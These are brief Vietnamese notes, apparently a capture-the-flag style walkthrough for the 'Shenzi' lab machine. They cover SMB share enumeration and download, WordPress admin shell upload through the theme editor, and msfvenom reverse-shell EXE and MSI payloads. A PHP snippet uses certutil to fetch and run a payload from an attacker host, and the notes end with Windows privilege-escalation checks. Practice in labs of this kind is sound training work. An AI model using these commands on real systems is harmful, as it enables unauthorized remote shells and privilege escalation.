Skip to main content

Shenzi - smb -

Port 80 Không có gì fpt ko vào anonymous được

SMB có share dùng netexec smb $target -u 'guest' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true OUTPUT_FOLDER=. EXCLUDE_FILTER='PRINT$','IPC$','SYSVOL','NETLOGON' để download toàn bộ về

Tips Wordpess

Login admin

  1. File upload -> upload shel rồi run
  2. Edit template

-> Appearance -> theme editor -> 404.php -> thay bằng shell rồi chạy

Cách 2

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.176 LPORT=4444 -f exe -o 64.exe

<?php
exec("certutil -urlcache -split -f <http://192.168.45.176/64.exe> C:\\\\Windows\\\\Temp\\\\64.exe");
exec("C:\\\\Windows\\\\Temp\\\\64.exe");
?>

.\\PowerUp.ps1; Invoke-AllChecks . .\PrivescCheck.ps1; Invoke-PrivescCheck

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.176 LPORT=4443 -a x64 --platform Windows -f msi -o rev.msi msiexec /i C:\Users\shenzi\Desktop\rev.msi /qn

hint hostname info

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"